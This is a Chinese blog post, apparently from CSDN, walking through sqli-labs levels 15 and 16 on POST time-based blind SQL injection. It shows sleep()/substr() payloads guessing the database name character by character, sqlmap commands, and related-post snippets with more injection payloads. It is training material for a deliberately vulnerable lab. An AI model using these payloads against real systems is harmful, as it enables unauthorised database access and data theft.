sqli-labs-master第15、16关

最新推荐文章于 2025-03-16 23:12:37 发布
最新推荐文章于 2025-03-16 23:12:37 发布
阅读量2.4k 收藏 2
点赞数
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43606134/article/details/106103048
版权

前言:在第九关我们已经了解过GET方式的盲注,我们今天一起探讨下POST方式的盲注。
第15关
http://192.168.89.134/sqli-labs-master/Less-15/
在这里插入图片描述
我们在尝试了,联合查询和报错注入方式后无果,我们初步判断为盲注
我们看下源代码:
在这里插入图片描述
猜想正确
我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。)
admin’ and if(length(database()=8),sleep(5),1) #
这句话意思就是 如果条件成立,就停止5秒
在这里插入图片描述
看这延迟5秒中,说明猜想数据库8位正确
我们继续猜解库名
admin’ and if(substr(database(),1,1)=‘s’,sleep(5),1)–+
admin’ and if(substr(database(),2,1)=‘e’,sleep(5),1)–+
admin’ and if(substr(database(),3,1)=‘c’,sleep(5),1)–+
admin’ and if(substr(database(),4,1)=‘u’,sleep(5),1)–+
admin’ and if(substr(database(),5,1)=‘r’,sleep(5),1)–+
admin’ and if(substr(database(),6,1)=‘i’,sleep(5),1)–+
admin’ and if(substr(database(),7,1)=‘t’,sleep(5),1)–+
admin’ and if(substr(database(),8,1)=‘y’,sleep(5),1)–+
像这样继续猜解不断尝试
如果想进一步得到用户、密码信息,继续不断猜解…
反正盲注很麻烦并且浪费时间!

第十六关
把admin’换成admin’’)其他的步骤都一样

我们用sqlmap去验证
在这里有一点需要和大家强调的
我们用昨天的命令:
sqlmap -r 15.txt
在这里插入图片描述
说没扫描出来,我查阅了一些资料sqlmap默认的注入能力是level=1,我们改成3
sqlmap -r 15.txt --level=3
在这里插入图片描述
提示我们有基于时间的盲注还有版本信息
接下来都一样,我省略一些步骤,直接看结果
在这里插入图片描述
这次真的好慢,可能是因为我们级别调成3

总结:经过了POST方式盲注基本和GET方式相同,换汤不换药。

本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助

sqli-labs(15)
jimggg的博客
03-20 653
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注) 这里写的清清楚楚 A 先拆解长度 然后在逐步拆解 and是与运算;or是或运算。 区别2: and运算要前后两个运算对象都为真是,and运算结果才为真; or运算是两个运算对象中有一个为真,or运算结果就为真。 区别3: and运算中如...
SQLi-labs-Master(1-22)新手通宝典
Myosotis_LL的博客
05-18 3020
欢迎来到《SQLi-labs-Master新手通宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs靶场第十五
gou1791241251的博客
12-27 1020
第十五没什么特殊的,只是单引号闭合而已。
【sql靶场】第15、16-post提交盲注保姆级教程
最新发布
m0_75167824的博客
03-16 1015
个人建议使用BurpSuite,因为可以清楚看见自己的注入,如果出现错误比较好检查,也比较好修改,而在页面的输入框直接注入,第一由于输入框的大小限制,很影响注入语句的输入与观看,第二输入提交后注入语句会变成空,如果报错很难检查与修改错误。‌中,而非URL参数,URL中仅包含资源路径,这里就不需要再地址栏进行测试,但是我们可以在页面的账号密码输入里尝试,可不可以进行注入。使用BurpSuite,点击代理然后点击截断的截断请求,然后打开火狐浏览器,打开卡页面,随便输入账号密码,点击提交。
sqli-labs第十五
yuqnqi的博客
05-09 988
我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。在尝试之后,联合查询和报错注入方式后无果,我们初步判断为盲注。正确的时候可以直接登录,不正确的时候这里会延时 5 秒。页面无回显,单靠页面无法判断闭合方式,所以得查看源码。本属于时间注入,基于源码分析,闭合字符是单引号。最后就是猜数据库表和猜数据库了,这里就不在叙述了。看这延迟5秒中,说明猜想数据库8位正确。
sqli-labs第15——基于post型的时间盲注,使用sqlmap工具
m0_73752956的博客
08-29 558
属于时间注入,基于源码分析,闭合字符是单引号。由于过程较复杂,这里使用sqlmap跑数据。这样我们就跑完了所有数据。
小记sqli-labs 1-16
weixin_58358185的博客
11-13 350
sqli-labs、sql注入靶场
Sqli-labs-master靶场之1-21秘籍
m0_66241651的博客
07-03 863
靶场就是让我们掌握sql注入的基本方法,通秘籍来了,轻轻松松搞定!
Sqli-labs-master超详细通教程(1-23基础篇)
m0_67391270的博客
06-12 3582
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs靶场第五less-5
wanggonghanfei的博客
10-02 1331
sqli-labs第五less-5用extractvalue()函数报错注入
Sqli-labs靶场(1-20
2301_77977773的博客
07-03 1030
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
SQLI-labs-第十五和第十六
weixin_54055099的博客
05-06 1238
Sqlilab的第十五和十六,时间盲注
Sqli-Labs Less1-16详细讲解
大大大蜜蜂的博客
10-21 4004
information_schema数据库介绍: information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。元数据是于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。information_schema是信息数据库,其中保存着于mysql服务器所维护的所有其他数据库的信息。 下列为information_schema数据库中schemata表、tables表、columns表的介绍。 schemata表:提供了当前mysql实例中所有数据库的信息。 sche
sql-labs靶场第十六测试报告
ccc_9wy的博客
10-18 1362
sql-labs第十六的测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程;盲注。
sqli-labs第十五和十六(post请求-布尔盲注)
qq_42266432的博客
08-26 993
开启第十五,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本,脚本的思路和之前使用布尔盲注的卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
SQLi LABS Less 16 布尔盲注
热门推荐
wangyuxiang946的博客
08-14 1万+
SQLi 第十六SQLi-LABS Less-16,SQLi-LABS Less 16,SQLiLABS Less16,SQLi Less 16
sqli-labs的第15的布尔脚本(附代码分析)
skoyine的博客
05-02 1593
sqli-labs的第15布尔盲注脚本 因为最近在复习python,所以找个项目练练手,本人是个菜鸡,代码哪里有问题欢迎大佬指出 import requests import time host = "http://127.0.0.1/sqli-labs/Less-15/" def getDatabase(): # 获取数据库名 global host ans = '' # 最外面的循环是数据库名的字符长度,就是从第几个字符开始
Sqlilabs-15
KAKA的博客
07-07 884
这一来到了第 15 ,值得注意的是,这一是布尔和时间盲注的结合,很好玩哦~ 因为有时间盲注,这里就直接上菜了,下面是几个例子 –查表 uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit –查列 uname=admin' a
sqli-labs靶场15-16(基于POST时间盲注)
qq_46527080的博客
12-12 977
第十五 sqlmap方法 python2 sqlmap.py -u "http://127.0.0.1/sqlilabs/Less-15/?id=1" --data "uname=admin&passwd=1&submit=Submit" --current-db --threads 8 --technique T 基于时间的盲注 源码分析 闭合字符是单引号 一、判断注入点 uname=admin' and sleep(4) #&passwd=&submit=Submit
sqli-labs-master答案
01-14
### SQLi-Labs项目概述 SQLi-Labs是一个用于学习和实践SQL注入技术的平台,旨在帮助安全研究人员理解和掌握各种类型的SQL注入漏洞及其利用方法。通过一系列由易到难的任务挑战,参与者可以逐步提升自己的技能水平。 ### 于Less-15的具体分析 对于Less-15而言,目标是在给定条件下成功执行时间盲注攻击。当用户名字段接收到特定构造的数据时,服务器端会根据数据库名称第二个字符是否为'e'来决定响应延迟的时间长度。如果条件成立,则触发`sleep(1)`函数使HTTP请求处理过程暂停一秒;反之则立即返回结果[^1]。 ```sql uname=1' OR IF(SUBSTRING((SELECT database()), 2, 1)='e', sleep(1), 1) -- ``` 这段代码展示了如何构建恶意输入字符串以实现上述逻辑。需要注意的是,在实际环境中应当避免任何形式的安全测试除非获得了合法授权。 ### 判断注入点的方法 为了确认是否存在可被利用的SQL注入漏洞以及确定正确的语法结构,可以通过尝试提交特殊字符并观察应用程序的行为来进行初步探测。例如,向应用发送包含单引号或双引号在内的数据包,依据其反馈信息判断SQL查询语句使用的分隔符类型及可能存在的错误位置[^3]。 ### 进一步探索其他卡 除了当前讨论的内容外,还有更多有趣的题目等待着大家去解锁。比如即将介绍的Less-16将会带来新的知识点和技术细节上的变化,值得期待[^2]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值